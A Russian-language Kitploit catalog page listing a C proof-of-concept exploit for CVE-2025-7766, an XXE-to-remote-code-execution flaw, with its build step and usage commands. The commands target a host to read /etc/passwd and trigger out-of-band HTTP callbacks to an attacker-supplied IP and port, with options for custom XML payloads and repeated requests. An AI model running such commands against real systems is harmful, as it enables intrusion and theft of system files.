Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-7766 — C-эксплойт PoC для CVE-2025-7766, демонстрирующий XXE-to-RCE посредством чтения файлов и внеполосных HTTP-обратных вызовов. Поддерживает пользовательские XML-нагрузки и повторные запросы. | Kitploit
Инструменты/GitHubGitHub/bytereaper77/cve-2025-7766
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной НагрузкиArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

C-эксплойт PoC для CVE-2025-7766, демонстрирующий XXE-to-RCE посредством чтения файлов и внеполосных HTTP-обратных вызовов. Поддерживает пользовательские XML-нагрузки и повторные запросы.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-7766 PoC Эксплойт

PoC для эксплуатации уязвимости XML External Entity в CVE-2025-7766. Демонстрирует чтение файла (/etc/passwd) и внеполосные HTTP-обратные вызовы.

Автор: Byte Reaper

CVE: CVE-2025-7766

Уязвимость: Удаленное выполнение кода через XML External Entity (XXE)


PoC для эксплуатации XXE в CVE-2025-7766. Демонстрирует:

  • Чтение /etc/passwd с целевого хоста.
  • Запуск внеполосного HTTP-запроса на ваш сервер.

Требования

  • gcc
  • libcurl
  • библиотека argparse

Сборка

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

Использование

root@kitploit:~
# Полезная нагрузка для чтения файла
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Полезная нагрузка для внеполосного запроса
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Пользовательская полезная нагрузка
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Повторить запросы 5 раз
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Подробный вывод
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

ЛИЦЕНЗИЯ:

MIT

Скачать инструмент